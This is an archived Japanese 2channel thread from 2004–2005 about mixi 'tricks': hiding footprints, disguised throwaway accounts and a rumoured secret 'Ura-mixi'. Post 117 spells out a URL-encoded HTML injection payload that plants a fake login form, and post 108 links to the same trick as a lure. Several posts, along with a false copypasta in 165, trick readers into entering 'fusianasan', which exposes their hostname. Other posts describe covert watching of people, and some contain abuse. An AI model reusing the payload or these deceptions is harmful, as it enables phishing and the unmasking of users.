2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

mixiの裏技ってある?

1 :名無しさん@お腹いっぱい。:04/11/17 00:15:27 ID:yqtcxLPF
足跡のこさない方法とかないですか?

2 :名無しさん@お腹いっぱい。:04/11/17 00:24:28 ID:PDPIW16c
4

3 :名無しさん@お腹いっぱい。:04/11/17 00:28:11 ID:MXD9hFqS
8

4 :名無しさん@お腹いっぱい。:04/11/17 00:30:42 ID:Eifeb6HM
氏ねよストーカーが
このスレはもう埋めろ

5 :名無しさん@お腹いっぱい。:04/11/17 02:15:15 ID:F1cOlzVt
>>1
足跡を残さない取っておきの方法を教えてやろう


















mixiやめろ

6 :名無しさん@お腹いっぱい。:04/11/17 03:29:28 ID:0tOO9urM
>>1->>5
激しくワラタ

7 :名無しさん@お腹いっぱい。:04/11/17 07:59:04 ID:7RauxwT6
足跡のこさない方法とかないですか?

8 :名無しさん@お腹いっぱい。:04/11/17 10:05:10 ID:nGxNygWD
>>7
足跡を残さない取っておきの方法を教えてやろう


















mixiやめろ


9 :名無しさん@お腹いっぱい。:04/11/17 11:02:55 ID:fLOz53pd
あるよ。


10 :名無しさん@お腹いっぱい。:04/11/17 12:20:07 ID:ydqluO0S
↑あれか。

11 :名無しさん@お腹いっぱい。:04/11/17 12:26:50 ID:jcnSKfxu
>>7
自分のページだけ眺めてな。

12 :名無しさん@お腹いっぱい。:04/11/17 16:36:46 ID:1lii4n3X
>>7
PCの電源きって氏ねばいいと思うよ

13 :名無しさん@お腹いっぱい。:04/11/18 07:56:35 ID:sFBgXipS
裏技あるよ。
IDカキコしなメッセージをミク内で送るよ。

14 :名無しさん@お腹いっぱい。:04/11/18 12:02:23 ID:YGPdF7nc
>>13
もっとくわしく!

15 :名無しさん@お腹いっぱい。:04/11/18 13:21:50 ID:Ci3RPVJd
被ってるかもしれないがおれも知っている
つーか公にするわけにはいかないだろう
ミクメッセかますからニックネーム教えれ
で、教えた方法はあまり広めるな
ちなみに捨て垢反対派だから捨て垢なら教えない

16 :名無しさん@お腹いっぱい。:04/11/18 14:47:23 ID:RuoYIzjC
誰も「裏mixi」のことに触れていないな。
知ってるヤツってどれぐらい居るんだ?

17 :名無しさん@お腹いっぱい。:04/11/18 15:34:08 ID:gr7vNkRJ
>>16
こんなとこに書くなバカチン。
特定の人が楽しめれば十分だ。

18 :名無しさん@お腹いっぱい。:04/11/18 17:39:54 ID:RuoYIzjC
>>17
なんだか知ってるヤツ案外少なそうだな。

19 :名無しさん@お腹いっぱい。:04/11/19 00:27:18 ID:FFOrsMyd
そして都市伝説へ


20 :名無しさん@お腹いっぱい。:04/11/19 02:58:10 ID:N15ALYcl
ふしあなさんが始まりそうな予感

21 :名無しさん@お腹いっぱい。:04/11/19 19:52:29 ID:u/DAK7gF
すげえワロタ

22 :名無しさん@お腹いっぱい。:04/11/20 12:05:37 ID:joVwcR/k
なになに、fusianasanと名前欄にかけば、裏mixiへの入り方がわかるのか。
そうなのか、見破ったぜ。
おまえら、ばればれすぎw

23 :名無しさん@お腹いっぱい。:04/11/20 12:20:36 ID:HHQQ/Zkg
父子穴なんか関係ない。

info@mixi.jp、パスワード内緒で管理者では入れるんだよ。


24 :名無しさん@お腹いっぱい。:04/11/20 12:57:55 ID:V/S4YXZv
お前ら教えるなよ絶対!!

25 :名無しさん@お腹いっぱい。:04/11/20 13:27:09 ID:b4DWt08E
オレの裏ミク、彼女にナイショで女ばっかマイミクしてる。
どーせおまえらも似たような使い方してんだろ?

26 :名無しさん@お腹いっぱい。:04/11/22 04:12:06 ID:qCIfFtXJ
自分で自分を紹介して
その紹介した垢でもう一回自分を紹介して
最初の垢は消して自分との繋がりも消えて
その出来上がった捨て垢で適当に健全なコミュに10個くらい入って
適当なキャラ作って何人か誰でもマイミクOKな奴のをマイミク登録して

これで捨て垢と見破られない偽捨て垢完成

27 :名無しさん@お腹いっぱい。:04/11/23 00:52:44 ID:F95S22ca
>>26
バカ技じゃん。

28 :名無しさん@お腹いっぱい。:04/11/30 10:56:41 ID:qQFXjOxc
あしあとって確かに残したくない時あるよ。
日記が面白くて読みたいのに、あしあとベタベタ付いて
気持悪がられたくないからあんま見に行けない。


29 :名無しさん@お腹いっぱい。:04/11/30 12:02:30 ID:9rkRS6oV
>>28
足跡を気にするより先に、
コミュニケートの方法を考えましょう。

30 :名無しさん@お腹いっぱい。:04/11/30 21:49:43 ID:7XY3B0fP
>>28
別に悪がらないでしょう

31 :名無しさん@お腹いっぱい。:04/11/30 22:07:34 ID:qQFXjOxc
>>29
日記読みたいだけで会話する気はないんだけど、キモがられたくもない・・・。

>>30
そうかな?だといいんだけど、べたべた足跡ついてたらキモくない?
なんか無言でマイミクをねだってるみたいに思われそうで。


32 :名無しさん@お腹いっぱい。:04/11/30 23:32:12 ID:UZjHw7oM
>28
分かる。
どうしても見に行くのを遠慮しちゃう。

33 :名無しさん@お腹いっぱい。:04/12/01 00:42:21 ID:MPttHtrE
>>31
自意識過剰だね。

34 :名無しさん@お腹いっぱい。:04/12/01 01:33:42 ID:FtVB7HQV
>>33
自意識というか、誰だろうと関係なく
無言で足あとベタベタ付けてたらキモくない?

35 :名無しさん@お腹いっぱい。:04/12/01 02:22:37 ID:FqZNi8eF
そういう人居るけど、マイミクする程でも無いけど
(若しくは機会を待ってる)日記見てくれてるのかなーって
勝手に考えてるよ。

36 :名無しさん@お腹いっぱい。:04/12/01 05:27:57 ID:ekTeVgC4
(音 ̄ー ̄速)y-~~<大変なんだね

37 :名無しさん@お腹いっぱい。:04/12/02 12:10:24 ID:yi9hMl18
GREEってあしあと機能あるんだろうか

38 :名無しさん@お腹いっぱい。:04/12/02 15:46:45 ID:dJCuX8z9
翻訳サイトつかって
翻訳を通してmixiみれば足跡付かないよ。

39 :名無しさん@お腹いっぱい。:04/12/02 16:05:25 ID:r5MDtT8g
ほんまdせつか?

40 :名無しさん@お腹いっぱい。:04/12/03 00:14:54 ID:rQxEsfYm
親父から何度も無言で足跡だけ残されるのはキモい。20代女より

41 :名無しさん@お腹いっぱい。:04/12/03 01:15:07 ID:jz3IrUbp
(音 ̄ー ̄速)y-~~<ブロックしろよ

42 :名無しさん@お腹いっぱい。:04/12/03 07:37:00 ID:5pac2gTK
えっ!日記読みに行ってるだけでブロックですか?

まあいずれにせよ、やっぱキモいよな〜。
会話する気はないけど日記読みたいときって
どうすればいいんだろう。

ちなみに親父とは?>40

43 :名無しさん@お腹いっぱい。:04/12/03 11:37:13 ID:CzcjZorb
なんで会話する気ないの?
ちょっとした挨拶位してみれば?
たまにコメント位書けば?
なんの為にmixiやってるの?

44 :名無しさん@お腹いっぱい。:04/12/03 11:39:59 ID:uARC3fYL
>>43のスタンスがSNSの基本。

45 :名無しさん@お腹いっぱい。:04/12/03 12:06:24 ID:3WdtPB0K
>43,44
mixiは既に友人・知人であることが前提。
コメントつけたり会話すんのはせいぜいマイミクのマイミクまででしょ。
いきなりなんのつながりもない人からそんなんされても困る人が大半。

46 :名無しさん@お腹いっぱい。:04/12/03 12:27:18 ID:24ALtPph
>>45
激しく同意
ただ読み物としておもしろいから知らない人の日記でも読みに行く事はある。

47 :名無しさん@お腹いっぱい。:04/12/03 12:33:20 ID:5pac2gTK
会話する気ないと言うか、読んでる日記が
たくさんあるからキリがないんだよね・・・。
マイミクの人にコメント書くだけでいっぱいいっぱいなんですわ。
他所よりも気使うし、おっつかなくなってしまう。

48 :名無しさん@お腹いっぱい。:04/12/03 12:35:04 ID:UPpzTN2v
日記が面白くて結構見に行く所があるんだけど(書き込みもする)
その人は友人以外のマイミクはお断りしてますみたいな事を
プロフィールに書いてて、結局、友達公開の日記になっちゃったんだけど
その時、マイミク申請が向こうから来て、なんか嬉しかった。

49 :名無しさん@お腹いっぱい。:04/12/03 13:38:45 ID:CzcjZorb
>>45-46
コミュニティで他の人と会話しないの?
自分はそれに近い感覚で使ってるけどな。

既知の人以外にコメントつけられるのが嫌な人は
限定公開にしてると決め付けてるから、
公開してるからにはなんらかの反応が欲しいんだと思ってるんだが。

自分もなんのつながりも無い人に書かれるのはちょっと躊躇するけど、
マイミク繋がり(孫曾孫も含む)とか共通のコミュの人なら
全く無問題だし歓迎するけどなあ。

ただ内輪の書き込みが延々続く所は場違いかなと遠慮はする。

50 :名無しさん@お腹いっぱい。:04/12/03 14:01:06 ID:24ALtPph
>>49
ミクシーって基本はリアル内輪物だしね

51 :名無しさん@お腹いっぱい。:04/12/03 20:29:28 ID:RFVS5R8T
日記見に行く度に踏み返されると
「なんだまたこいつかよ、うぜっ」と思われそうで
見に行けなくなってしまう。大体5.6回連続で踏み返されると
見に行けなくなる。かと言って無視されるのも寂しいし、
日記だけでいいから足あと消せるようになってほしー!

52 :名無しさん@お腹いっぱい。:04/12/03 21:50:38 ID:6O9SFPmo
>>51
気にしなけりゃいいじゃん。Mixiはそういうもんなんだよ。
自分が同じ事されたと考えて、どう思うかを考えればいいじゃん。
考え方は人それぞれだけどね。

53 :名無しさん@お腹いっぱい。:04/12/03 21:58:56 ID:CzcjZorb
>>51
いや〜
うぜっ!とか思ったら踏み返さないと思うけどなあ。
自分の場合にはそういう人がいて
コメントできそうな話題が日記に出たら
挨拶しようか位思ってる。
「足跡から来ました〜♪」程度のバカコメントは付けたくないので
タイミングを見計らってたりして(w
まあ相手が自分の日記を見に来てくれてるのか
足跡で反射的に来てるのかがわからないのが難しいんだけどね。
ただの自動巡回だったりすることもあるし…orz

54 :名無しさん@お腹いっぱい。:04/12/04 00:29:50 ID:p4Gt621S
いつも楽しみに読んでます
また来ます

(音 ̄ー ̄速)y-~~< くらいの挨拶もできないのか

55 :名無しさん@お腹いっぱい。:04/12/15 10:50:57 ID:TNd7lSk7
mixiは事務局レベルで個人情報筒抜けだから、気を付けた方がいいですよ。
規約によると、ヤフオク利用者は迷惑防止条例違反で逮捕されるみたいです。
管理DB内のメッセージや日記等も、全て監視下にある模様。
サイトホームのヘルプー利用規約をご覧下さい。
偽名、マイミク・メッセージ大量発信、
複数アカウント所持等も、即、退会のようです。充分にご注意下さい。
ご不明な点は、運営側に直接問い合わせた方が良いと思います。
プライバシー漏洩等、後に被害を被らない為にも。

56 :名無しさん@お腹いっぱい。:04/12/17 02:37:59 ID:x+uyihBF
へえー

57 :名無しさん@お腹いっぱい。:04/12/17 12:52:23 ID:dEmUvE2W

ウラミクシーの行き方マダー?

58 :名無しさん@お腹いっぱい。:04/12/18 10:42:42 ID:E2WNRFj3


偽名なんて当然だろ
本名晒してやってるのか?

59 :名無しさん@お腹いっぱい。:04/12/18 22:47:24 ID:SLxMv1Nt
偽名はたしかに普通かと。
いきなり本名さらしている人は勇気あると思う。

60 :名無しさん@お腹いっぱい。:04/12/18 23:36:56 ID:OBBNgmf2
勇気あるっていうか危機管理能力0

61 :名無しさん@お腹いっぱい:04/12/19 00:42:00 ID:0VPNi1Og
出身地、画像、本名
これ晒せるヤツは、根性ある奴かただのバカ
いくら身内で使うといっても、ここはひどいインターネットで(ry

ギリで出身地。

62 :名無しさん@お腹いっぱい。:04/12/19 01:03:18 ID:T6VddmfK
名前が左にながれる人ってどうやってるの?
java?

63 :名無しさん@お腹いっぱい。:04/12/19 01:18:54 ID:LI17TOx9
メールアドレスも捨てアドレスがデフォでしょ

64 :名無しさん@お腹いっぱい。:04/12/19 01:23:38 ID:+5xloc48
趣味も捨て趣味がデフォでしょ

65 :名無しさん@お腹いっぱい。:04/12/19 01:43:54 ID:v0yWW/ZM
人生は投げやりがデフォでしょ

66 :名無しさん@お腹いっぱい。:04/12/19 02:37:10 ID:qLJspU27
>>62
<marquee >

67 :名無しさん@お腹いっぱい。:04/12/19 05:24:33 ID:/engDPpb
>>66
もう少し詳しく。

68 :名無しさん@お腹いっぱい。:04/12/19 05:30:34 ID:tZvQOWSh
>>67
やってる人多いからわかるやん。足跡とか見てみ?

69 :名無しさん@お腹いっぱい。:04/12/19 05:32:41 ID:/engDPpb
足跡見て何が分かるの?

70 :名無しさん@お腹いっぱい。:04/12/19 05:38:12 ID:/engDPpb
すいません。すぐ出来ました。

71 :名無しさん@お腹いっぱい。:04/12/19 10:52:36 ID:vc3k92wp
タグ使うバグ?が流行ってるな
バグ発見コミュにも書き込みがちらほらと...

ttp://mixi.jp/view_bbs.pl?id=150974

72 :名無しさん@お腹いっぱい。:04/12/22 16:31:43 ID:njXneItW
名前欄にタグ使うのって流行?

73 :名無しさん@お腹いっぱい。:04/12/22 17:12:59 ID:WsAXsE4E
>>72
もう終わった

74 :名無しさん@お腹いっぱい。:05/01/03 07:20:05 ID:GSFiNCz0
裏みくしぃ行けなかったけど>>22のおかげで行けたあああ
やっとわかったああああ。ありがとう!!!!1
裏みくしぃで待ってますw

75 :名無しさん@お腹いっぱい。:05/01/03 17:59:06 ID:HYDePedG
ツマンネ。死ねよ

76 :名無しさん@お腹いっぱい。:05/01/20 19:49:04 ID:4/0C6eO2
>>74
う゛ぁーか
晒しage

77 :名無しさん@お腹いっぱい。:05/01/21 21:02:30 ID:BieNfw2I
AAA

78 :usr203174214137.usr.starcat.ne.jp:05/01/21 21:03:03 ID:BieNfw2I
aaa

79 :名無しさん@お腹いっぱい。:05/01/21 21:04:04 ID:BieNfw2I
(( ´,_ゝ`)プッ

80 :名無しさん@お腹いっぱい。:05/01/22 00:19:36 ID:WI9FI7PA
誰か、閲覧用に
つかってもいいアカウントとパスワードをおしえてくれない?

81 :名無しさん@お腹いっぱい。:05/01/22 00:22:09 ID:2RttSCnG
嫌です^^

82 :名無しさん@お腹いっぱい。:05/01/22 09:31:45 ID:PyY/o80H
>>80
いくらで?

83 :名無しさん@お腹いっぱい。:05/01/24 09:48:09 ID:GtvGGgK8
ミクシーで面白い日記を探すより、普通にリンク集を辿って面白いサイトを探した方が早い。
ちなみに裏ミクシーはマジであるよ。
行ったところで、たどり着く人が少ないから結局廃れてるけどなっ。

84 :名無しさん@お腹いっぱい。:05/01/25 20:37:25 ID:1prkqjEq
>>83
まさか主催もこれほど見つけ難くなるとは思わなかったんだろうな。
ポツリ、ポツリと漏れて、そこそこの賑わいになるだろうと想定していた節がある。
特に初期の頃の書き込みやイベントを見ると。
何かの拍子に盛り上がるかもしれないから、数日に一度は覗いてはいるけど。

85 :名無しさん@お腹いっぱい。:05/01/26 11:00:39 ID:PXvRfUHI
釣れますか?

86 :仕方ないな:05/01/26 13:31:09 ID:2m27Wq9T
2chで名前欄に
http://mixi.jp/asdfusianasanjkl
と打ち込んで書き込むと招待なしでもミクシィに登録できるよ。

87 :名無しB大きなおっぱい:05/01/26 13:41:20 ID:6HIi+7aI
↑釣り?

88 :http://mixi.jp/asdfusiansanjkl:05/01/26 13:47:05 ID:RH1ySR/C
てst

89 :名無しさん@お腹いっぱい。:05/01/26 13:48:21 ID:RH1ySR/C
登録画面キターーー!!!

90 :名無しさん@お腹いっぱい。:05/01/26 16:52:42 ID:hIFNpVds
足跡が残るのをいちいち気にする人がいるようだが、

他のウェブサイトで
面白いコンテンツが日々更新されているとして、
リファラとかアクセス元URLとか
自動的にチェックされていたらどうするんだろう。

清潔に関する強迫観念みたいだな。

91 :名無しさん@お腹いっぱい。:05/01/26 18:00:32 ID:C2RGT8R2
>>90
それと足跡は似てて非なる話

92 :http://mixi.jp/asd d2fe53db.tcat.ne.jpjkl :05/01/26 21:24:15 ID:OHW5z3xH
ほんとに?

93 :http://mixi.jp/asdfusiansanjkl:05/01/26 21:27:32 ID:OHW5z3xH
てst


94 :http://mixi.jp/asdfujiyamasanjkl:05/01/27 00:16:29 ID:uEZflbQA
test!!!

95 :名無しさん@お腹いっぱい。:05/01/27 00:58:36 ID:PBqEObFS
やっちゃお


96 :名無しさん@お腹いっぱい。:05/01/27 09:11:38 ID:lgnzudQp
日記にURLのっけてリンクってできるの?

おしえてちょ

97 :名無しさん@お腹いっぱい。:05/01/27 10:38:13 ID:x/yIk2pc
やってみりゃいいだろブス

98 :名無しさん@お腹いっぱい。:05/01/27 23:55:30 ID:A1Vuf9TK
>97
そんな言い方しないで教えてあげればいいじゃん

ここで聞く前に自分でテストするべし
削除だって可能なんだし

99 :名無しさん@お腹いっぱい。:05/01/28 06:13:32 ID:9mpgDVf3
>>98
何このキチガイ
死ねよ

100 :名無しさん@お腹いっぱい。:05/01/28 07:06:10 ID:2uEmfumr


101 :http://mixi.jp/asdfusiansanjkl:05/01/28 09:10:12 ID:RknHYLRC
.

102 :名無しさん@お腹いっぱい。:05/01/28 12:41:57 ID:pgxwJjkG
>>96はmixiどころかネットをやる資格なし

103 :96:05/01/28 13:23:09 ID:enCzMC9F
>>102
分かりましたインターネッツやめました
これでいいですか?

104 :名無しさん@お腹いっぱい。:05/01/28 13:34:59 ID:YEYM52e+
>>99
m9(^Д^)プギャー

105 :名無しさん@お腹いっぱい。:05/01/28 23:16:00 ID:PDhYDf9C
コミュを偽装するんだよ

106 :名無しさん@お腹いっぱい。:05/01/28 23:30:14 ID:3ZR107PB
偽装しすぎて誰も参加しない恐れも蟻

107 :名無しさん@お腹いっぱい。:05/01/29 01:26:56 ID:aXyy4qIS
test

108 :名無しさん@お腹いっぱい。:05/01/31 00:06:11 ID:VMU/BQ7O
裏mixi入り口
http://mixi.jp/view_diary.pl?url=http://qrl.jp/?159037


109 :http://mixi.jp/asd 203-165-91-236.rev.home.ne.jpjkl:05/01/31 00:38:42 ID:A61gbBkD
///



110 :名無しさん@お腹いっぱい。:05/01/31 00:44:24 ID:PRinJL1z
jcomか…。

111 :名無しさん@お腹いっぱい。:05/01/31 07:10:31 ID:aO4PfMED
裏mixiって何?
>>108のやつ、入れなかったんだけど…。

112 :名無しさん@お腹いっぱい。:05/01/31 12:51:36 ID:j+xowZIE
ログインしてれば見れたよ。
ワロス

113 :名無しさん@お腹いっぱい。:05/01/31 12:59:14 ID:q7Oe5n8j
裏mixiの入・E・ とか化けててなんだか恐いんだけど
どうなるの??

114 :名無しさん@お腹いっぱい。:05/01/31 13:23:28 ID:Awbk//68
>>292
もちろん知らん奴拾うつもりありませんけど
なんだろ?
↓これクリックしたの関係あるかな?

108 名無しさん@お腹いっぱい。 05/01/31 00:06:11 ID:VMU/BQ7O
裏mixi入り口
http://mixi.jp/view_diary.pl?url=http://qrl.jp/?159037

115 :名無しさん@お腹いっぱい。:05/01/31 13:57:30 ID:RwksnN2D
まじ>>108ってなんですか??

きになる・・・

116 :名無しさん@お腹いっぱい。:05/01/31 14:03:20 ID:+xSK2jfY
入れなければ何度でも試すんだ!!!

117 :名無しさん@お腹いっぱい。:05/01/31 14:20:35 ID:1zxhPIBi
http://mixi.jp/send_message.pl?id=2%22%22%3E%3Ca%22%3E%3C/td%3E%3Ctd%3E-
-%CE%A2mixi%A4%CE%C6%FE%A4%EA%B8%FD--%3C/td%3E%3Ctd%3E%3Cimg%20sr
c=http://img.mixi.jp/img/bfr_right.gif%20WIDTH=23%20HEIGHT=23%3E%3C/td%3E%
3C/tr%3E%3C/table%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3Cform%20action=invit
e.pl%20method=post%3E%3Ccenter%3E%3Cinput%20type=hidden%20name=submit%20
value=non_member%3E%3Cinput%20type=hidden%20name=email%20value=%22yui99
9jp@excite.co.jp%22%3EE-Mail:%3Cinput%20type=text%20name=last_name%3E%3Cbr
%3EPassword:%3Cinput%20type=text%20name=first_name%20%3E%3Cinput%20type=
hidden%20name=message%20value=%22nullpo%22%3E%3Cbr%3E%3Cinput%20type=s
ubmit%20value=%22Login%22%3E%3C/center%3E%3C/form%3E%3Cbr%3E%3C!--

118 :名無しさん@お腹いっぱい。:05/01/31 14:29:29 ID:1zxhPIBi
http://mixi.jp/show_friend.pl?id=2

(・∀・)ニヤニヤ

119 :名無しさん@お腹いっぱい。:05/01/31 14:31:27 ID:1zxhPIBi
yui999jp@excite.co.jp

こっちかな?(・∀・)ニヤニヤ

120 :名無しさん@お腹いっぱい。:05/01/31 14:35:21 ID:1zxhPIBi
http://mixi.jp/send_message.pl?id=2%22%22%3E%3Ca%22%3E%3C/


ってことだよね?(・∀・)

121 :名無しさん@お腹いっぱい。:05/01/31 15:02:33 ID:b3UlbIAP
>>119のアドレスに招待状を送信させる仕組みになってるんだろ。
でもって>>119のアドレスは乞食スレにあるアドレスだから、招待不可になると。

122 :名無しさん@お腹いっぱい。:05/01/31 15:05:42 ID:n/0ST6Q/
最近の乞食は随分と姑息だなw

123 :名無しさん@お腹いっぱい。:05/01/31 20:42:29 ID:+xSK2jfY
何度もクリックさせられればバカを退会させることも可能ないい手が解りました

124 :名無しさん@お腹いっぱい。:05/02/05 23:51:03 ID:j/Cfre46
>>106

コミュ偽装とはヲチする人の
コミュに入るんだよ
そすればヲチされてると
気づかれない

125 :名無しさん@お腹いっぱい。:05/02/06 00:18:24 ID:SKxP6XL/
>>124
なるほど…でもヲチ対象者がすでに退会の模様

いまだからいうけどヲチ専のコミュ作ってるんだけど
タイトルを凝りすぎて?誰も来ないのよ…

まぁ今となっちゃこのコミュも不要に近いんだけどさ

126 :http://mixi.jp/asd 61-21-238-173.rev.home.ne.jpjkl:05/02/06 21:25:25 ID:J36bvvc7
いまさらテスト

127 :名無しさん@お腹いっぱい。:05/02/07 02:00:04 ID:Q/07BOC+
あしあとのページをブックしとけば、ログイン5分以内とかにならない?
トップページに入るとログインされちゃうんだよね?


128 :名無しさん@お腹いっぱい。:05/02/07 02:32:09 ID:fTHcuTfM
mixiやってみたいけど周りにやってる人がいないorz

129 :名無しさん@お腹いっぱい。:05/02/07 02:43:47 ID:NWyx0vKx
>>127
いいところに気付いたね。
さらに自分自身をmixiの「お気に入りに追加」するとログイン時間が確認できるよん。
やり方は過去レスに出てたと思う。

130 :名無しさん@お腹いっぱい。:05/02/07 03:47:46 ID:Q/07BOC+
>>129
うそ〜ん、過去レス探したけど見つからない。よかったら教えてもらえない?

131 :名無しさん@お腹いっぱい。:05/02/07 04:22:05 ID:122+T2Of
この板探せばすぐ見つかるよ。

132 :名無しさん@お腹いっぱい。:05/02/07 04:48:27 ID:GlwK1wkc
とある方法で自分をお気に入りに追加しようとしたら…
「自分自身をお気に入り登録する事はできません」って表示が出たような。
やり方が話題になった少し後だったけど、対策取られたのかな?
それとも、今でもできるやり方があるのだろうか…。

133 :名無しさん@お腹いっぱい。:05/02/07 11:09:29 ID:kGwfR1u8
おれもできなかった

134 :名無しさん@お腹いっぱい。:05/02/10 04:23:04 ID:oAZJSJre
>55
最近、内部の人間でもないと知り得ないような情報が漏れている、と知人から相談を受けたのだが、事務局はザルなのか?

135 :名無しさん@お腹いっぱい。:05/02/10 04:26:36 ID:Jvzwu/2M
>>134
内部てw
4人しかいないんですけど?


136 :名無しさん@お腹いっぱい。:05/02/10 08:49:07 ID:J34MaZg8
>>134
イタイ香具師がよくそのように騒ぐけど大抵は漏れた場所は別に
あることが多いぞ。
そうじゃない香具師はどこから漏れたかの検証が難しいのを知ってるので
あまり騒がないな。

137 :名無しさん@お腹いっぱい。:05/02/11 14:41:15 ID:lDsi03Dt
足跡のこさない方法とかないですか?


138 :名無しさん@お腹いっぱい。:05/02/11 15:01:44 ID:eid0XpfL
4

139 :名無しさん@お腹いっぱい。:05/02/11 16:38:38 ID:QaIt+ns+
>>130>>132>>133
http://mixi.jp/add_bookmark.pl?id=******

140 :名無しさん@お腹いっぱい。:05/02/11 22:11:34 ID:alda9Vfp
>>139
できた!ありがとうーヽ( ´∀`)ノ

141 :名無しさん@お腹いっぱい。:05/02/17 17:54:12 ID:9r6v0tpt
お気に入り登録してる人の最終ログインがお気に入りページに表示されるもの
と、ハンドル検索で表示されるページのものと違うんだが、どういうこと?

ハンドル検索で表示される最終ログインはトップページにアクセスした最終記
録で、お気に入りページに表示される最終ログインがホントの最終ログインと
いうことなんだろか?

142 :名無しさん@お腹いっぱい。 :05/02/17 19:13:53 ID:P36iQUJJ
>>141
検索で出てくる情報は古い。

ちょっと前は全ての人間が「三日以上」でプロフィールも、
新しく書いたのが反映されないで、去年のものだった。
新しく入った奴は検索には出てこなかったし。

その後一回更新されたけど、また更新無いんじゃないかな。
下手したら一ヶ月に1回更新とかね。

143 :名無しさん@お腹いっぱい。:05/02/17 21:46:24 ID:9r6v0tpt
>>142
そういうことなんだ。
たまに検索しても出てこない人がいるのもそういうわけだったんだね。
どうもありがとう。

144 :http://mixi.jp/asd ZL190018.ppp.dion.ne.jpjkl:05/03/01 15:27:11 ID:6bVOcK0c
テスト

145 :http://mixi.jp/asd ZL190018.ppp.dion.ne.jpjkl:05/03/01 15:31:35 ID:6bVOcK0c
エツト

146 :ZL190018.ppp.dion.ne.jp:05/03/01 15:35:07 ID:6bVOcK0c
hosi

147 :名無しさん@お腹いっぱい。:05/03/01 15:38:32 ID:6bVOcK0c
できた☆ すごいv

148 :名無しさん@お腹いっぱい。:05/03/01 16:57:46 ID:v5Ni2zfY
>>139
ありがとー♪

149 :名無しさん@お腹いっぱい。:05/03/05 01:03:26 ID:FQZnLqC9
テスト

150 :名無しさん@お腹いっぱい。:05/03/09 03:16:50 ID:CV/HH3UK
足跡を残さない方法がコミュで晒されてた

http://mixi.jp/view_bbs.pl?id=558190

151 :名無しさん@お腹いっぱい。:05/03/09 20:28:52 ID:bZvks1A8
うはwwwwwwwwwwwwwwおkwwwwwwwwwwwwwwwwwww

152 :名無しさん@お腹いっぱい。:05/03/11 01:16:38 ID:8MdvJXuM
>>150
そんな方法を公に出すなよw

153 :名無しさん@お腹いっぱい。:05/03/12 22:06:25 ID:wxFxAs0t
ログイン時間が残らないように
いつもあしあとページから入ってたら
さっきから突然セッションエラーがでた
くそ!

154 :名無しさん@お腹いっぱい。:05/03/12 23:04:50 ID:Ztd/TpiX
>>153
ログインできたよ

155 :http://mixi.jp/asdfujiyamasanjkl:05/03/13 10:38:03 ID:hoBlRkCc
test

156 :名無しさん@お腹いっぱい。:05/03/13 14:34:18 ID:yWAoi1FM
p

157 :名無しさん@お腹いっぱい。:05/03/13 15:25:44 ID:T3o5F8BK
   ∧∧
   (=゚ω゚)ノ ぃょぅ、就職しちゃえYO!
 〜(  x)
   U U
ttp://www.find-job.net/list/j31745.html

158 :名無しさん@お腹いっぱい。:05/03/14 12:05:46 ID:1/4hj+Al
>>157の求人は

>掲載期間: 03/11 〜 03/24

159 :名無しさん@お腹いっぱい。:05/03/15 12:38:45 ID:ydgh+I10
>>157の 
せっかく見つけたのに応募する勇者はおらんのかーっ
就職してスタッフになる極裏技。

160 :名無しさん@お腹いっぱい。 :05/03/16 14:44:02 ID:SBveXeW7
足跡残さないツールがあるらしい

161 :名無しさん@お腹いっぱい。:05/03/16 18:06:47 ID:6Hfa0oiH
教えれ

162 :http://mixi.jp/asd YahooBB221041232010.bbtec.netjkl :05/03/16 19:20:19 ID:5ynjj3qW
test

163 :名無しさん@お腹いっぱい。:05/03/19 02:03:59 ID:5++1a5u6
2chで自分のIDが晒されて無いか調べるのって、どうやんの?

164 :名無しさん@お腹いっぱい。:05/03/19 02:10:55 ID:/cUL7zt/
検索しる。

165 :名無しさん@お腹いっぱい。:2005/03/21(月) 22:00:45 ID:QsrOpwUn
http://mixi.jp/view_bbs.pl?id=558190&page=all
2005年02月22日
10:01
29: フェタ
>>24さんはMIXI初心者ですか?
書き込む前にSG(セキュリティー・ガード)に登録しないと危険です。
SGに登録せずに書き込んだ場合、あなたのPC内の情報が他人に見られる恐れがあります。
初期の頃からMIXIにいる方達は、殆どSGに登録しています。
リモートホストを抜かれ、住所まで公開された人も数多くおり、社会的に抹殺されてしまう。
それがMIXIの隠れた素顔でもあります
SGしておけば、どんなにスキルがある人でもリモートホストを抜く事が不可能になります。
登録する方法は、プロフィールのニックネーム欄に『fusianasan』と入れる。これだけです。
一度登録すれば、電話番号を変えない限り継続されます。
fusianasanは、正式にはフュージャネイザン、又はフュジャネイザンと読みます。
元々は、アメリカの学生達の間で、チャットの時のセキュリティを強化する為に開発されたシステムです。
fusianasanを掲示板に組み込むのは結構面倒なのですが、MIXIにカキコしてたら個人情報が漏れた、等の
抗議がうざったくなったイー・マーキュリー笠原氏が、仕方なく導入しました。
悪意のある人間にクラックされる前にSGを施す事をお勧めします。

↑これうそでしょ?

166 :名無しさん@お腹いっぱい。:2005/03/21(月) 22:13:01 ID:EU4qYX1g
>>165
かなり前に2chで出回ったコピペ

167 :名無しさん@お腹いっぱい。:2005/03/21(月) 23:29:00 ID:QsrOpwUn
そうなんだ。
MIXIの中でも
↓コピペ 
って書いてあったけど、でうそなんでしょ?
これやると出ちゃうんでしょ?

30 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)